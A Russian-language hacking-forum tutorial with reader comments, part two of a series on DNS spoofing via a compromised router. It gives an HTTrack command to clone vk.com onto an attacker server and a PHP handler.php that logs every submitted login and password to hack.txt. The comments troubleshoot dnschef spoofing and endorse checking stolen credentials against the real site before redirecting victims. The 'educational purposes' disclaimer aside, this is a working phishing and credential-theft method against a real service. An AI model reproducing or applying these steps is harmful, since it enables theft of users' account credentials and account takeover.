• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья [1] - Подмена DNS роутера. Граббинг сайта и получение доступов.

r0hack

r0hack

DAG
Gold Team
29.09.2017
482
901
Статья написана только для образовательных целей. Все делайте на свой страх и риск.

Всем Салам и Доброй ночи. Люблю сидеть ночью и писать статьи, вообще такое желание возникла в далеком 2012 году, когда еще учился в школе, создал компьютерный блог и писал много статей и в то время блог был достаточно популярным в этой тематике. И теперь вот ночью включаю какую-то комедию и начинаю писать. Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.

Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.

[0] – Немного теории. Что у нас есть?

Итак, давайте подробнее. Какими будут наши шаги:

1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.
[1] - Подмена DNS роутера. Граббинг сайта и получение доступов.


2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.

На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.


[1] – Практика.

[1.1] – Граббинг сайта.

Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:
Код:
httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
Тут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:

[1] - Подмена DNS роутера. Граббинг сайта и получение доступов.


[1] - Подмена DNS роутера. Граббинг сайта и получение доступов.


Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.

[1.2] - Получаем доступы к аккаунту

Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
В домашней директории создадим файл handler.php с содержимым:
Код:
$file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
А на главной странице фейка, в параметр action подставим handler.php
[1] - Подмена DNS роутера. Граббинг сайта и получение доступов.


Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле.
[1] - Подмена DNS роутера. Граббинг сайта и получение доступов.


Вуаля, таким образом мы можем вернуть наш взломанный аккаунт, соседом.

На этом закончим 2ою часть. Всем удачи и не нарушайте закон !

Часть 1
Часть 3
 
Последнее редактирование:
Rollly

Rollly

Happy New Year
31.12.2017
111
127
* Unknown option: headers
При запуске httrack
 
Rollly

Rollly

Happy New Year
31.12.2017
111
127
HTTrack вообще установлен сам? Команда валидная, у вас значит какая-то другая ошибка
Установлен.
root@vm212708:~# httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
* Unknown option: headers

root@vm212708:~#
 
Rollly

Rollly

Happy New Year
31.12.2017
111
127
Скрин киньте, и путь для сохранения верный?
Вообщем проблема такая, я все настроил днс прописал, решил сначала попробовать войти через телефон, при этом включив мобильную версию, тут мне пишет невозможно получить доступ к сайту, но если прописать m.vk.com, все идёт на оф сайт. Решил через ноутбук попробовать, и о чудо, все сработало, ввел данные, захожу на сервак так как был включен dnschef, я вышел из сервера, и снова вошёл, не обнаружив файла hack.txt, как я понял мне нужно было его создать, я его создал, и снова запустил dnschef, захожу на сайт через ноутбук, и сразу же появился официальный сайт vk, а не фейк, такое было не впервые, на прошлой неделе я пытался запустить подмену, и все сработало, только фейк заработал на телефоне, и чтобы получил логи, я снова вышел из сервера и зашёл, логи получил, решил снова запустить dnschef, и теперь снова фейк перестал работать, может быть ты поймёшь в чем проблема? Я старался все детально описать, как я понял, после получения логов, он перестает делать подмену, и редирект идёт уже на оф сайт.
 
r0hack

r0hack

DAG
Gold Team
29.09.2017
482
901
Вообщем проблема такая, я все настроил днс прописал, решил сначала попробовать войти через телефон, при этом включив мобильную версию, тут мне пишет невозможно получить доступ к сайту, но если прописать m.vk.com, все идёт на оф сайт. Решил через ноутбук попробовать, и о чудо, все сработало, ввел данные, захожу на сервак так как был включен dnschef, я вышел из сервера, и снова вошёл, не обнаружив файла hack.txt, как я понял мне нужно было его создать, я его создал, и снова запустил dnschef, захожу на сайт через ноутбук, и сразу же появился официальный сайт vk, а не фейк, такое было не впервые, на прошлой неделе я пытался запустить подмену, и все сработало, только фейк заработал на телефоне, и чтобы получил логи, я снова вышел из сервера и зашёл, логи получил, решил снова запустить dnschef, и теперь снова фейк перестал работать, может быть ты поймёшь в чем проблема? Я старался все детально описать, как я понял, после получения логов, он перестает делать подмену, и редирект идёт уже на оф сайт.
Сложно сказать, почему у вас так. Пробуйте с другого браузера заходить например, может сохраняется кеш. Если есть наблюдения, что после записей логов потом не переходит на фейк, то просто не записывайте, сделайте, как написано в статье. В фейковых доменах укажите всевозможные алиасы домена --fakedomains=vk.com,

Точно не могу сказать, у меня если сервер запущен, стабильно переходит на фейк. Может от роутера тоже зависит, но это не точно. Я тестировал на D-link и Mikrotik, полет был нормальный.
 
Rollly

Rollly

Happy New Year
31.12.2017
111
127
Заметил еще одно, если написать вконтакте через поиск, то при переходе будет написано, что страница недоступна, это происходит из за того, что в поиске указан https://vk.com. т.е при переходе будет оф.страница. И не факт, что подмена будет всегда работать, так как большинство добавляют сайты в закладки с https.
 
  • Нравится
Реакции: UsNm
S

shebang

Продолжайте публикации, очень увлекательно!!!!!
 
gushmazuko

gushmazuko

Red Team
24.03.2017
159
388
Можно ли в handler.php замутить скрипт который сверет логин+пароль на валидность по адресу: " link removed", в случае успеха записывает их в файл и перенаправяет клиента на реальный сайт? Схожая схема с Fluxion.
 
r0hack

r0hack

DAG
Gold Team
29.09.2017
482
901
Можно ли в handler.php замутить скрипт который сверет логин+пароль на валидность по адресу: " link removed", в случае успеха записывает их в файл и перенаправяет клиента на реальный сайт? Схожая схема с Fluxion.
Да, получится.
Если валидно, то перенаправляет на https.
 
  • Нравится
Реакции: gushmazuko
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб